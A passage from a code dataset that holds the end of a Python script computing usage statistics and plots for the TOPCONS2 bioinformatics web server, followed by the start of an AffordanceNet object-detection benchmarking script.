webcom.loginfo(\"create all submitted sql db...\\n\", gen_logfile)\n hdl = myfunc.ReadLineByBlock(allsubmitjoblogfile)\n # [\"name\" numjob, numseq, numjob_web, numseq_web,numjob_wsdl, numseq_wsdl]\n dict_submit_day = {}\n dict_submit_week = {}\n dict_submit_month = {}\n dict_submit_year = {}\n if not hdl.failure:\n lines = hdl.readlines()\n while lines is not None:\n for line in lines:\n strs = line.split(\"\\t\")\n if len(strs) < 8:\n continue\n submit_date_str = strs[0]\n numseq = 0\n try:\n numseq = int(strs[3])\n except (IndexError, ValueError):\n pass\n method_submission = strs[7]\n is_valid_submit_date = True\n try:\n submit_date = webcom.datetime_str_to_time(submit_date_str)\n except ValueError:\n is_valid_submit_date = False\n if is_valid_submit_date: # {{{\n day_str = submit_date_str.split()[0]\n (beginning_of_week, end_of_week) = myfunc.week_beg_end(submit_date)\n week_str = beginning_of_week.strftime(\"%Y-%m-%d\")\n month_str = submit_date.replace(day=1).strftime(\"%Y-%m-%d\")\n year_str = submit_date.replace(month=1, day=1).strftime(\"%Y-%m-%d\")\n day = int(day_str.replace(\"-\", \"\"))\n week = int(submit_date.strftime(\"%Y%V\"))\n month = int(submit_date.strftime(\"%Y%m\"))\n year = int(submit_date.year)\n if day not in dict_submit_day:\n # all web wsdl\n dict_submit_day[day] = [day_str] + 6*[0]\n if week not in dict_submit_week:\n dict_submit_week[week] = [week_str] + 6*[0]\n if month not in dict_submit_month:\n dict_submit_month[month] = [month_str] + 6*[0]\n if year not in dict_submit_year:\n dict_submit_year[year] = [year_str] + 6*[0]\n dict_submit_day[day][1] += 1\n dict_submit_day[day][2] += numseq\n dict_submit_week[week][1] += 1\n dict_submit_week[week][2] += numseq\n dict_submit_month[month][1] += 1\n dict_submit_month[month][2] += numseq\n dict_submit_year[year][1] += 1\n dict_submit_year[year][2] += numseq\n if method_submission == \"web\":\n dict_submit_day[day][3] += 1\n dict_submit_day[day][4] += numseq\n dict_submit_week[week][3] += 1\n dict_submit_week[week][4] += numseq\n dict_submit_month[month][3] += 1\n dict_submit_month[month][4] += numseq\n dict_submit_year[year][3] += 1\n dict_submit_year[year][4] += numseq\n if method_submission == \"wsdl\":\n dict_submit_day[day][5] += 1\n dict_submit_day[day][6] += numseq\n dict_submit_week[week][5] += 1\n dict_submit_week[week][6] += numseq\n dict_submit_month[month][5] += 1\n dict_submit_month[month][6] += numseq\n dict_submit_year[year][5] += 1\n dict_submit_year[year][6] += numseq\n# }}}\n # Write to SQL{{{\n row = {}\n row['jobid'] = strs[1]\n row['jobname'] = strs[5]\n row['ip'] = strs[2]\n row['method_submission'] = method_submission\n row['numseq'] = numseq\n row['submit_date'] = submit_date_str\n row['email'] = strs[6]\n myfunc.WriteSQLiteAllSubmitted(cur_s, tablename=sql_tablename,\n data=[row])\n# }}}\n lines = hdl.readlines()\n hdl.close()\n\n con_s.commit()\n con_s.close()\n\n li_submit_day = []\n li_submit_week = []\n li_submit_month = []\n li_submit_year = []\n li_submit_day_web = []\n li_submit_week_web = []\n li_submit_month_web = []\n li_submit_year_web = []\n li_submit_day_wsdl = []\n li_submit_week_wsdl = []\n li_submit_month_wsdl = []\n li_submit_year_wsdl = []\n dict_list = [dict_submit_day, dict_submit_week, dict_submit_month,\n dict_submit_year]\n li_list = [li_submit_day, li_submit_week, li_submit_month, li_submit_year,\n li_submit_day_web, li_submit_week_web, li_submit_month_web,\n li_submit_year_web, li_submit_day_wsdl, li_submit_week_wsdl,\n li_submit_month_wsdl, li_submit_year_wsdl]\n\n for i in range(len(dict_list)):\n dt = dict_list[i]\n sortedlist = sorted(list(dt.items()), key=lambda x: x[0])\n for j in range(3):\n li = li_list[j*4+i]\n k1 = j*2 + 1\n k2 = j*2 + 2\n for kk in range(len(sortedlist)):\n items = sortedlist[kk]\n if items[1][k1] > 0 or items[1][k2] > 0:\n li.append([items[1][0], items[1][k1], items[1][k2]])\n\n outfile_submit_day = f\"{path_stat}/submit_day.stat.txt\"\n outfile_submit_week = f\"{path_stat}/submit_week.stat.txt\"\n outfile_submit_month = f\"{path_stat}/submit_month.stat.txt\"\n outfile_submit_year = f\"{path_stat}/submit_year.stat.txt\"\n outfile_submit_day_web = f\"{path_stat}/submit_day_web.stat.txt\"\n outfile_submit_week_web = f\"{path_stat}/submit_week_web.stat.txt\"\n outfile_submit_month_web = f\"{path_stat}/submit_month_web.stat.txt\"\n outfile_submit_year_web = f\"{path_stat}/submit_year_web.stat.txt\"\n outfile_submit_day_wsdl = f\"{path_stat}/submit_day_wsdl.stat.txt\"\n outfile_submit_week_wsdl = f\"{path_stat}/submit_week_wsdl.stat.txt\"\n outfile_submit_month_wsdl = f\"{path_stat}/submit_month_wsdl.stat.txt\"\n outfile_submit_year_wsdl = f\"{path_stat}/submit_year_wsdl.stat.txt\"\n flist = [outfile_submit_day, outfile_submit_week, outfile_submit_month,\n outfile_submit_year,\n outfile_submit_day_web, outfile_submit_week_web,\n outfile_submit_month_web, outfile_submit_year_web,\n outfile_submit_day_wsdl, outfile_submit_week_wsdl,\n outfile_submit_month_wsdl, outfile_submit_year_wsdl]\n for i in range(len(flist)):\n outfile = flist[i]\n li = li_list[i]\n try:\n fpout = open(outfile, \"w\")\n fpout.write(\"%s\\t%s\\t%s\\n\" % ('Date', 'numjob', 'numseq'))\n for j in range(len(li)): # name njob nseq\n fpout.write(\"%s\\t%d\\t%d\\n\" % (li[j][0], li[j][1], li[j][2]))\n fpout.close()\n except IOError:\n pass\n # plotting\n if os.path.exists(outfile) and li: # have at least one record\n # if os.path.basename(outfile).find('day') == -1:\n # extends date time series for missing dates\n freq = dataprocess.date_range_frequency(os.path.basename(outfile))\n try:\n dataprocess.extend_data(outfile,\n value_columns=['numjob', 'numseq'],\n freq=freq, outfile=outfile)\n except Exception as e:\n webcom.loginfo(f\"Failed to extend data for {outfile} with errmsg: {e}\",\n gen_errfile)\n pass\n cmd = [f\"{binpath_plot}/plot_numsubmit.sh\", outfile]\n webcom.RunCmd(cmd, gen_logfile, gen_errfile)\n\n # output waittime vs numseq_of_job\n # output finishtime vs numseq_of_job\n outfile_waittime_nseq = f\"{path_stat}/waittime_nseq.stat.txt\"\n outfile_waittime_nseq_web = f\"{path_stat}/waittime_nseq_web.stat.txt\"\n outfile_waittime_nseq_wsdl = f\"{path_stat}/waittime_nseq_wsdl.stat.txt\"\n outfile_finishtime_nseq = f\"{path_stat}/finishtime_nseq.stat.txt\"\n outfile_finishtime_nseq_web = f\"{path_stat}/finishtime_nseq_web.stat.txt\"\n outfile_finishtime_nseq_wsdl = f\"{path_stat}/finishtime_nseq_wsdl.stat.txt\"\n\n outfile_avg_waittime_nseq = f\"{path_stat}/avg_waittime_nseq.stat.txt\"\n outfile_avg_waittime_nseq_web = f\"{path_stat}/avg_waittime_nseq_web.stat.txt\"\n outfile_avg_waittime_nseq_wsdl = f\"{path_stat}/avg_waittime_nseq_wsdl.stat.txt\"\n outfile_avg_finishtime_nseq = f\"{path_stat}/avg_finishtime_nseq.stat.txt\"\n outfile_avg_finishtime_nseq_web = f\"{path_stat}/avg_finishtime_nseq_web.stat.txt\"\n outfile_avg_finishtime_nseq_wsdl = f\"{path_stat}/avg_finishtime_nseq_wsdl.stat.txt\"\n\n outfile_median_waittime_nseq = f\"{path_stat}/median_waittime_nseq.stat.txt\"\n outfile_median_waittime_nseq_web = f\"{path_stat}/median_waittime_nseq_web.stat.txt\"\n outfile_median_waittime_nseq_wsdl = f\"{path_stat}/median_waittime_nseq_wsdl.stat.txt\"\n outfile_median_finishtime_nseq = f\"{path_stat}/median_finishtime_nseq.stat.txt\"\n outfile_median_finishtime_nseq_web = f\"{path_stat}/median_finishtime_nseq_web.stat.txt\"\n outfile_median_finishtime_nseq_wsdl = f\"{path_stat}/median_finishtime_nseq_wsdl.stat.txt\"\n\n flist1 = [outfile_waittime_nseq, outfile_waittime_nseq_web,\n outfile_waittime_nseq_wsdl, outfile_finishtime_nseq,\n outfile_finishtime_nseq_web, outfile_finishtime_nseq_wsdl]\n\n flist2 = [outfile_avg_waittime_nseq, outfile_avg_waittime_nseq_web,\n outfile_avg_waittime_nseq_wsdl, outfile_avg_finishtime_nseq,\n outfile_avg_finishtime_nseq_web, outfile_avg_finishtime_nseq_wsdl]\n\n flist3 = [outfile_median_waittime_nseq,\n outfile_median_waittime_nseq_web,\n outfile_median_waittime_nseq_wsdl,\n outfile_median_finishtime_nseq,\n outfile_median_finishtime_nseq_web,\n outfile_median_finishtime_nseq_wsdl]\n\n dict_list = [waittime_numseq_dict, waittime_numseq_dict_web,\n waittime_numseq_dict_wsdl, finishtime_numseq_dict,\n finishtime_numseq_dict_web, finishtime_numseq_dict_wsdl]\n\n for i in range(len(flist1)):\n dt = dict_list[i]\n outfile1 = flist1[i]\n outfile2 = flist2[i]\n outfile3 = flist3[i]\n sortedlist = sorted(list(dt.items()), key=lambda x: x[0])\n try:\n fpout = open(outfile1, \"w\")\n fpout.write(\"%s\\t%s\\n\" % ('numseq', 'time'))\n for j in range(len(sortedlist)):\n nseq = sortedlist[j][0]\n li_time = sortedlist[j][1]\n for k in range(len(li_time)):\n fpout.write(\"%d\\t%f\\n\" % (nseq, li_time[k]))\n fpout.close()\n except IOError:\n pass\n try:\n fpout = open(outfile2, \"w\")\n fpout.write(\"%s\\t%s\\n\" % ('numseq', 'time'))\n for j in range(len(sortedlist)):\n nseq = sortedlist[j][0]\n li_time = sortedlist[j][1]\n avg_time = myfunc.FloatDivision(sum(li_time), len(li_time))\n fpout.write(\"%d\\t%f\\n\" % (nseq, avg_time))\n fpout.close()\n except IOError:\n pass\n try:\n fpout = open(outfile3, \"w\")\n fpout.write(\"%s\\t%s\\n\" % ('numseq', 'time'))\n for j in range(len(sortedlist)):\n nseq = sortedlist[j][0]\n li_time = sortedlist[j][1]\n median_time = numpy.median(li_time)\n fpout.write(\"%d\\t%f\\n\" % (nseq, median_time))\n fpout.close()\n except IOError:\n pass\n\n # plotting\n flist = flist1\n for i in range(len(flist)):\n outfile = flist[i]\n if os.path.exists(outfile):\n cmd = [f\"{binpath_plot}/plot_nseq_waitfinishtime.sh\", outfile]\n webcom.RunCmd(cmd, gen_logfile, gen_errfile)\n flist = flist2 + flist3\n for i in range(len(flist)):\n outfile = flist[i]\n if os.path.exists(outfile):\n cmd = [f\"{binpath_plot}/plot_avg_waitfinishtime.sh\", outfile]\n webcom.RunCmd(cmd, gen_logfile, gen_errfile)\n# }}}\n\n\ndef run_statistics_topcons2(webserver_root, gen_logfile, gen_errfile): # {{{\n \"\"\"Server usage analysis specifically for topcons2\"\"\"\n path_log = os.path.join(webserver_root, 'proj', 'pred', 'static', 'log')\n path_stat = os.path.join(path_log, 'stat')\n binpath_plot = os.path.join(webserver_root, \"env\", \"bin\")\n runtimelogfile = f\"{path_log}/jobruntime.log\"\n\n webcom.loginfo(\"Run usage statistics for TOPCONS2...\\n\", gen_logfile)\n # get longest predicted seq\n # get query with most TM helics\n # get query takes the longest time\n extreme_runtimelogfile = f\"{path_log}/stat/extreme_jobruntime.log\"\n\n longestlength = -1\n mostTM = -1\n longestruntime = -1.0\n line_mostTM = \"\"\n line_longestruntime = \"\"\n\n # 3. get running time vs sequence length\n cntseq = 0\n cnt_hasSP = 0\n outfile_runtime = f\"{path_stat}/length_runtime.stat.txt\"\n outfile_runtime_pfam = f\"{path_stat}/length_runtime.pfam.stat.txt\"\n outfile_runtime_cdd = f\"{path_stat}/length_runtime.cdd.stat.txt\"\n outfile_runtime_uniref = f\"{path_stat}/length_runtime.uniref.stat.txt\"\n outfile_runtime_avg = f\"{path_stat}/length_runtime.stat.avg.txt\"\n outfile_runtime_pfam_avg = f\"{path_stat}/length_runtime.pfam.stat.avg.txt\"\n outfile_runtime_cdd_avg = f\"{path_stat}/length_runtime.cdd.stat.avg.txt\"\n outfile_runtime_uniref_avg = f\"{path_stat}/length_runtime.uniref.stat.avg.txt\"\n li_length_runtime = []\n li_length_runtime_pfam = []\n li_length_runtime_cdd = []\n li_length_runtime_uniref = []\n dict_length_runtime = {}\n dict_length_runtime_pfam = {}\n dict_length_runtime_cdd = {}\n dict_length_runtime_uniref = {}\n li_length_runtime_avg = []\n li_length_runtime_pfam_avg = []\n li_length_runtime_cdd_avg = []\n li_length_runtime_uniref_avg = []\n hdl = myfunc.ReadLineByBlock(runtimelogfile)\n if not hdl.failure:\n lines = hdl.readlines()\n while lines is not None:\n for line in lines:\n strs = line.split(\"\\t\")\n if len(strs) < 8:\n continue\n # jobid = strs[0]\n # seqidx = strs[1]\n runtime = -1.0\n try:\n runtime = float(strs[3])\n except (IndexError, ValueError):\n pass\n mtd_profile = strs[4]\n lengthseq = -1\n try:\n lengthseq = int(strs[5])\n except (IndexError, ValueError):\n pass\n\n numTM = -1\n try:\n numTM = int(strs[6])\n except (IndexError, ValueError):\n pass\n isHasSP = strs[7]\n\n cntseq += 1\n if isHasSP == \"True\":\n cnt_hasSP += 1\n\n if runtime > longestruntime:\n line_longestruntime = line\n longestruntime = runtime\n if lengthseq > longestlength:\n line_longestseq = line\n longestlength = lengthseq\n if numTM > mostTM:\n mostTM = numTM\n line_mostTM = line\n\n if lengthseq != -1:\n li_length_runtime.append([lengthseq, runtime])\n if lengthseq not in dict_length_runtime:\n dict_length_runtime[lengthseq] = []\n dict_length_runtime[lengthseq].append(runtime)\n if mtd_profile == \"pfam\":\n li_length_runtime_pfam.append([lengthseq, runtime])\n if lengthseq not in dict_length_runtime_pfam:\n dict_length_runtime_pfam[lengthseq] = []\n dict_length_runtime_pfam[lengthseq].append(runtime)\n elif mtd_profile == \"cdd\":\n li_length_runtime_cdd.append([lengthseq, runtime])\n if lengthseq not in dict_length_runtime_cdd:\n dict_length_runtime_cdd[lengthseq] = []\n dict_length_runtime_cdd[lengthseq].append(runtime)\n elif mtd_profile == \"uniref\":\n li_length_runtime_uniref.append([lengthseq, runtime])\n if lengthseq not in dict_length_runtime_uniref:\n dict_length_runtime_uniref[lengthseq] = []\n dict_length_runtime_uniref[lengthseq].append(runtime)\n lines = hdl.readlines()\n hdl.close()\n\n li_content = []\n for line in [line_mostTM, line_longestseq, line_longestruntime]:\n li_content.append(line)\n myfunc.WriteFile(\"\\n\".join(li_content)+\"\\n\", extreme_runtimelogfile,\n \"w\", True)\n\n # get lengthseq -vs- average_runtime\n dict_list = [dict_length_runtime, dict_length_runtime_pfam,\n dict_length_runtime_cdd, dict_length_runtime_uniref]\n li_list = [li_length_runtime_avg, li_length_runtime_pfam_avg,\n li_length_runtime_cdd_avg, li_length_runtime_uniref_avg]\n li_sum_runtime = [0.0]*len(dict_list)\n for i in range(len(dict_list)):\n dt = dict_list[i]\n li = li_list[i]\n for lengthseq in dt:\n avg_runtime = sum(dt[lengthseq])/float(len(dt[lengthseq]))\n li.append([lengthseq, avg_runtime])\n li_sum_runtime[i] += sum(dt[lengthseq])\n\n avg_runtime = myfunc.FloatDivision(li_sum_runtime[0],\n len(li_length_runtime))\n avg_runtime_pfam = myfunc.FloatDivision(li_sum_runtime[1],\n len(li_length_runtime_pfam))\n avg_runtime_cdd = myfunc.FloatDivision(li_sum_runtime[2],\n len(li_length_runtime_cdd))\n avg_runtime_uniref = myfunc.FloatDivision(li_sum_runtime[3],\n len(li_length_runtime_uniref))\n\n li_list = [li_length_runtime, li_length_runtime_pfam,\n li_length_runtime_cdd, li_length_runtime_uniref,\n li_length_runtime_avg, li_length_runtime_pfam_avg,\n li_length_runtime_cdd_avg, li_length_runtime_uniref_avg]\n flist = [outfile_runtime, outfile_runtime_pfam, outfile_runtime_cdd,\n outfile_runtime_uniref, outfile_runtime_avg,\n outfile_runtime_pfam_avg, outfile_runtime_cdd_avg,\n outfile_runtime_uniref_avg]\n for i in range(len(flist)):\n outfile = flist[i]\n li = li_list[i]\n sortedlist = sorted(li, key=lambda x: x[0])\n try:\n fpout = open(outfile, \"w\")\n fpout.write(\"%s\\t%s\\n\" % ('lengthseq', 'runtime'))\n for j in range(len(sortedlist)):\n lengthseq = sortedlist[j][0]\n runtime = sortedlist[j][1]\n fpout.write(\"%d\\t%f\\n\" % (lengthseq, runtime))\n fpout.close()\n except IOError:\n continue\n\n outfile_avg_runtime = f\"{path_stat}/avg_runtime.stat.txt\"\n try:\n fpout = open(outfile_avg_runtime, \"w\")\n fpout.write(\"%s\\t%f\\n\" % (\"All\", avg_runtime))\n fpout.write(\"%s\\t%f\\n\" % (\"Pfam\", avg_runtime_pfam))\n fpout.write(\"%s\\t%f\\n\" % (\"CDD\", avg_runtime_cdd))\n fpout.write(\"%s\\t%f\\n\" % (\"Uniref\", avg_runtime_uniref))\n fpout.close()\n except IOError:\n pass\n if os.path.exists(outfile_avg_runtime):\n cmd = [f\"{binpath_plot}/plot_avg_runtime.sh\", outfile_avg_runtime]\n webcom.RunCmd(cmd, gen_logfile, gen_errfile)\n\n flist = [outfile_runtime, outfile_runtime_pfam,\n outfile_runtime_cdd, outfile_runtime_uniref]\n for outfile in flist:\n if os.path.exists(outfile):\n cmd = [f\"{binpath_plot}/plot_length_runtime.sh\", outfile]\n webcom.RunCmd(cmd, gen_logfile, gen_errfile)\n\n cmd = [f\"{binpath_plot}/plot_length_runtime_mtp.sh\", \"-pfam\",\n outfile_runtime_pfam, \"-cdd\", outfile_runtime_cdd, \"-uniref\",\n outfile_runtime_uniref, \"-sep-avg\"]\n webcom.RunCmd(cmd, gen_logfile, gen_errfile)\n\n# 4. analysis for those predicted with signal peptide\n outfile_hasSP = f\"{path_stat}/noSP_hasSP.stat.txt\"\n content = \"%s\\t%d\\t%f\\n%s\\t%d\\t%f\\n\" % (\"\\\"Without SP\\\"\",\n cntseq-cnt_hasSP,\n myfunc.FloatDivision(cntseq-cnt_hasSP, cntseq),\n \"\\\"With SP\\\"\",\n cnt_hasSP,\n myfunc.FloatDivision(cnt_hasSP, cntseq))\n myfunc.WriteFile(content, outfile_hasSP, \"w\", True)\n cmd = [f\"{binpath_plot}/plot_nosp_sp.sh\", outfile_hasSP]\n webcom.RunCmd(cmd, gen_logfile, gen_errfile)\n\n# }}}\n\n\ndef main(): # {{{\n \"\"\"main procedure\"\"\"\n parser = argparse.ArgumentParser(description='Run server statistics',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog='''\\\nCreated 2022-03-05, updated 2022-03-05, Nanjiang Shu\n\nExamples:\n %s -i run_server_statistics.json\n''' % (sys.argv[0]))\n parser.add_argument('-i', metavar='JSONFILE', dest='jsonfile',\n type=str, required=True,\n help='Provide the Json file with all parameters')\n # parser.add_argument('-v', dest='verbose', nargs='?', type=int, default=0,\n # const=1,\n # help='show verbose information, (default: 0)')\n\n args = parser.parse_args()\n\n jsonfile = args.jsonfile\n\n if not os.path.exists(jsonfile):\n print(f\"Jsonfile {jsonfile} does not exist. Exit {progname}!\",\n file=sys.stderr)\n return 1\n\n g_params = {}\n g_params.update(webcom.LoadJsonFromFile(jsonfile))\n\n lockname = f\"{rootname_progname}.lock\"\n lock_file = os.path.join(g_params['path_log'], lockname)\n g_params['lockfile'] = lock_file\n fp = open(lock_file, 'w')\n try:\n fcntl.lockf(fp, fcntl.LOCK_EX | fcntl.LOCK_NB)\n except IOError:\n webcom.loginfo(f\"Another instance of {progname} is running\",\n g_params['gen_logfile'])\n return 1\n\n if 'DEBUG_LOCK_FILE' in g_params and g_params['DEBUG_LOCK_FILE']:\n time.sleep(g_params['SLEEP_INTERVAL']*6)\n status = run_statistics(g_params)\n if os.path.exists(lock_file):\n try:\n os.remove(lock_file)\n except OSError:\n webcom.loginfo(f\"Failed to delete lock_file {lock_file}\",\n g_params['gen_logfile'])\n return status\n# }}}\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"src/run_server_statistics.py","file_name":"run_server_statistics.py","file_ext":"py","file_size_in_byte":35116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"127102574","text":"from __future__ import print_function\n\n\"\"\"\nUse the confidence of the object detection as the confidence for object classification.\nIf the predicted class is cup, pan, bowl, then the confidence is used as the confidence\nof container.\nIf the predicted class is other classes, then the confidence is 0.\nIf there is no prediction, then the confidence is 0.\n\nThis code generates map for a single view among all the view of the 3D scanning.\n\nAuthor: Hongtao Wu\nJuly 5, 2020\n\"\"\"\n\n\"\"\"\nSee README.md for installation instructions before running.\nDemo script to perform affordace detection from images\n\"\"\"\n\n\nimport _init_paths\nfrom fast_rcnn.config import cfg\nfrom fast_rcnn.test import im_detect2\nfrom fast_rcnn.nms_wrapper import nms\nfrom utils.timer import Timer\n\nimport numpy as np\nimport os, cv2\nimport argparse\nimport json\n\nimport caffe\n\n\nCONF_THRESHOLD = 0.9\ngood_range = 0.005\n \n# get current dir\ncwd = os.getcwd()\nroot_path = '/home/hongtao/src/affordance-net' # get parent path\nprint ('AffordanceNet root folder: ', root_path)\n# img_folder = cwd + '/img'\ndata_dir = '/home/hongtao/Dropbox/ICRA2021/affnet_benchmark/affnet_benchmark_object'\nclass_folders = ['bowl', 'cup', 'drill', 'hammer', 'knife', 'pan', 'spatula']\n# class_folders = ['cup']\n\n\n\nOBJ_CLASSES = ('__background__', 'bowl', 'tvm', 'pan', 'hammer', 'knife', 'cup', 'drill', 'racket', 'spatula', 'bottle')\n\n# Mask\nbackground = [200, 222, 250] \nc1 = [0,0,205] # Contain\nc2 = [34,139,34] # Cut\nc3 = [192,192,128] # Display\nc4 = [165,42,42] # Engine\nc5 = [128,64,128] # grasp\nc6 = [204,102,0] # hit\nc7 = [184,134,11] # pound\nc8 = [0,153,153] # support\nc9 = [0,134,141] # w-grasp\nc10 = [184,0,141] \nc11 = [184,134,0] \nc12 = [184,134,223]\nlabel_colours = np.array([background, c1, c2, c3, c4, c5, c6, c7, c8, c9, c10, c11, c12])\n\n# Object (Bounding box)\ncol0 = [0, 0, 0]\ncol1 = [0, 255, 255]\ncol2 = [255, 0, 255]\ncol3 = [0, 125, 255]\ncol4 = [55, 125, 0]\ncol5 = [255, 50, 75]\ncol6 = [100, 100, 50]\ncol7 = [25, 234, 54]\ncol8 = [156, 65, 15]\ncol9 = [215, 25, 155]\ncol10 = [25, 25, 155]\n\ncol_map = [col0, col1, col2, col3, col4, col5, col6, col7, col8, col9, col10]\n\n\n\n\n\n\ndef reset_mask_ids(mask, before_uni_ids):\n # reset ID mask values from [0, 1, 4] to [0, 1, 2] to resize later \n counter = 0\n for id in before_uni_ids:\n mask[mask == id] = counter\n counter += 1\n \n return mask\n \n\n \ndef convert_mask_to_original_ids_manual(mask, original_uni_ids):\n #TODO: speed up!!!\n temp_mask = np.copy(mask) # create temp mask to do np.around()\n temp_mask = np.around(temp_mask, decimals=0) # round 1.6 -> 2., 1.1 -> 1.\n current_uni_ids = np.unique(temp_mask)\n \n out_mask = np.full(mask.shape, 0, 'float32')\n \n mh, mw = mask.shape\n for i in range(mh-1):\n for j in range(mw-1):\n for k in range(1, len(current_uni_ids)):\n if mask[i][j] > (current_uni_ids[k] - good_range) and mask[i][j] < (current_uni_ids[k] + good_range): \n out_mask[i][j] = original_uni_ids[k] \n #mask[i][j] = current_uni_ids[k]\n \n# const = 0.005\n# out_mask = original_uni_ids[(np.abs(mask - original_uni_ids[:,None,None]) < const).argmax(0)]\n \n #return mask\n return out_mask\n \n\n\n\ndef draw_arrow(image, p, q, color, arrow_magnitude, thickness, line_type, shift):\n # draw arrow tail\n cv2.line(image, p, q, color, thickness, line_type, shift)\n # calc angle of the arrow\n angle = np.arctan2(p[1]-q[1], p[0]-q[0])\n # starting point of first line of arrow head\n p = (int(q[0] + arrow_magnitude * np.cos(angle + np.pi/4)),\n int(q[1] + arrow_magnitude * np.sin(angle + np.pi/4)))\n # draw first half of arrow head\n cv2.line(image, p, q, color, thickness, line_type, shift)\n # starting point of second line of arrow head\n p = (int(q[0] + arrow_magnitude * np.cos(angle - np.pi/4)),\n int(q[1] + arrow_magnitude * np.sin(angle - np.pi/4)))\n # draw second half of arrow head\n cv2.line(image, p, q, color, thickness, line_type, shift)\n \ndef draw_reg_text(img, obj_info):\n #print 'tbd'\n \n obj_id = obj_info[0]\n cfd = obj_info[1]\n xmin = obj_info[2]\n ymin = obj_info[3]\n xmax = obj_info[4]\n ymax = obj_info[5]\n \n draw_arrow(img, (xmin, ymin), (xmax, ymin), col_map[obj_id], 0, 5, 8, 0)\n draw_arrow(img, (xmax, ymin), (xmax, ymax), col_map[obj_id], 0, 5, 8, 0)\n draw_arrow(img, (xmax, ymax), (xmin, ymax), col_map[obj_id], 0, 5, 8, 0)\n draw_arrow(img, (xmin, ymax), (xmin, ymin), col_map[obj_id], 0, 5, 8, 0)\n \n # put text\n txt_obj = OBJ_CLASSES[obj_id] + ' ' + str(cfd)\n cv2.putText(img, txt_obj, (xmin, ymin-5), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 1) # draw with red\n #cv2.putText(img, txt_obj, (xmin, ymin), cv2.FONT_HERSHEY_SIMPLEX, 1, col_map[obj_id], 2)\n \n# # draw center\n# center_x = (xmax - xmin)/2 + xmin\n# center_y = (ymax - ymin)/2 + ymin\n# cv2.circle(img,(center_x, center_y), 3, (0, 255, 0), -1)\n \n return img\n\n\n\ndef visualize_mask(im, rois_final, rois_class_score, rois_class_ind, masks, ori_height, ori_width, im_name, thresh):\n\n inds = np.where(rois_class_score[:, -1] >= thresh)[0]\n if len(inds) == 0:\n print ('No detected box with probality > thresh = ', thresh, '-- Choossing highest confidence bounding box.')\n inds = [np.argmax(rois_class_score)] \n max_conf = np.max(rois_class_score)\n if max_conf < 0.001: \n return None, None, [] ## confidence is < 0.001 -- no good box --> must return\n \n\n rois_final = rois_final[inds, :]\n rois_class_score = rois_class_score[inds,:]\n rois_class_ind = rois_class_ind[inds,:]\n \n\n # get mask\n masks = masks[inds, :, :, :]\n \n im_width = im.shape[1]\n im_height = im.shape[0]\n \n im_ori = np.copy(im)\n # transpose\n im = im[:, :, (2, 1, 0)]\n \n\n num_boxes = rois_final.shape[0]\n \n list_bboxes = []\n\n \n for i in xrange(0, num_boxes):\n \n curr_mask = np.full((im_height, im_width), 0.0, 'float') # convert to int later\n \n class_id = int(rois_class_ind[i,0])\n \n bbox = rois_final[i, 1:5]\n score = rois_class_score[i,0]\n \n if cfg.TEST.MASK_REG:\n\n x1 = int(round(bbox[0]))\n y1 = int(round(bbox[1]))\n x2 = int(round(bbox[2]))\n y2 = int(round(bbox[3]))\n\n x1 = np.min((im_width - 1, np.max((0, x1))))\n y1 = np.min((im_height - 1, np.max((0, y1))))\n x2 = np.min((im_width - 1, np.max((0, x2))))\n y2 = np.min((im_height - 1, np.max((0, y2))))\n \n cur_box = [class_id, score, x1, y1, x2, y2]\n list_bboxes.append(cur_box)\n \n h = y2 - y1\n w = x2 - x1\n \n mask = masks[i, :, :, :]\n mask = np.argmax(mask, axis=0)\n \n \n original_uni_ids = np.unique(mask)\n # print \"original_uni_ids: \", original_uni_ids\n stop = np.sum(original_uni_ids > 9)\n\n\n # sort before_uni_ids and reset [0, 1, 7] to [0, 1, 2]\n original_uni_ids.sort()\n mask = reset_mask_ids(mask, original_uni_ids)\n \n mask = cv2.resize(mask.astype('float'), (int(w), int(h)), interpolation=cv2.INTER_LINEAR)\n #mask = convert_mask_to_original_ids(mask, original_uni_ids)\n mask = convert_mask_to_original_ids_manual(mask, original_uni_ids)\n \n #FOR MULTI CLASS MASK\n curr_mask[y1:y2, x1:x2] = mask # assign to output mask\n \n # visualize each mask\n curr_mask = curr_mask.astype('uint8')\n color_curr_mask = label_colours.take(curr_mask, axis=0).astype('uint8')\n if stop:\n cv2.imshow('Mask' + str(i), color_curr_mask)\n cv2.imshow('Obj detection', img_out)\n cv2.waitKey(0) \n # cv2.imwrite(os.path.join(benchmark_folder,'mask_' + str(i) + '_' + im_name), color_curr_mask)\n\n\n # ori_file_path = img_folder + '/' + im_name \n # img_org = cv2.imread(ori_file_path)\n for ab in list_bboxes:\n print ('box: ', ab)\n img_out = draw_reg_text(im_ori, ab)\n \n \n # cv2.imshow('Obj detection', img_out)\n # cv2.waitKey(0)\n # cv2.imwrite(os.path.join(benchmark_folder, 'objdet_' + im_name), img_out)\n\n return color_curr_mask, img_out, list_bboxes\n \n\n\ndef run_affordance_net(net, image_name):\n\n im_file = img_folder + '/' + im_name\n im = cv2.imread(im_file)\n \n ori_height, ori_width, _ = im.shape\n \n # Detect all object classes and regress object bounds\n timer = Timer()\n timer.tic()\n if cfg.TEST.MASK_REG:\n rois_final, rois_class_score, rois_class_ind, masks, scores, boxes = im_detect2(net, im)\n else:\n 1\n timer.toc()\n \n # Visualize detections for each class\n color_cuur_mask, img_out, list_bboxes = visualize_mask(im, rois_final, rois_class_score, rois_class_ind, masks, ori_height, ori_width, im_name, thresh=CONF_THRESHOLD)\n\n return color_cuur_mask, img_out\n\n\ndef run_affordance_net_map(net, image_name):\n im_file = img_folder + '/' + im_name\n im = cv2.imread(im_file)\n\n ori_height, ori_width, _ = im.shape\n\n if cfg.TEST.MASK_REG:\n rois_final, rois_class_score, rois_class_ind, masks, scores, boxes = im_detect2(net, im)\n else:\n 1\n\n # print \"rois_final: \", rois_final\n # print \"scores shape: \", scores.shape\n # print \"masks shape: \", masks.shape\n # print \"boxes shape: \", boxes.shape\n # print \"rois_class_score: \", rois_class_score, rois_class_score.shape\n # print \"rois_class_ind: \", rois_class_ind, rois_class_ind.shape\n \n assert rois_class_score.shape == rois_class_ind.shape\n\n # Use the bounding box with the largest score as the classification result.\n largest_cfd_idx = np.argmax(rois_class_score)\n # print \"largest_cfd_idx: \", largest_cfd_idx\n\n obj_cfd = rois_class_score[largest_cfd_idx][0]\n obj_classification_idx = rois_class_ind[largest_cfd_idx][0]\n\n # Find the bounding box in 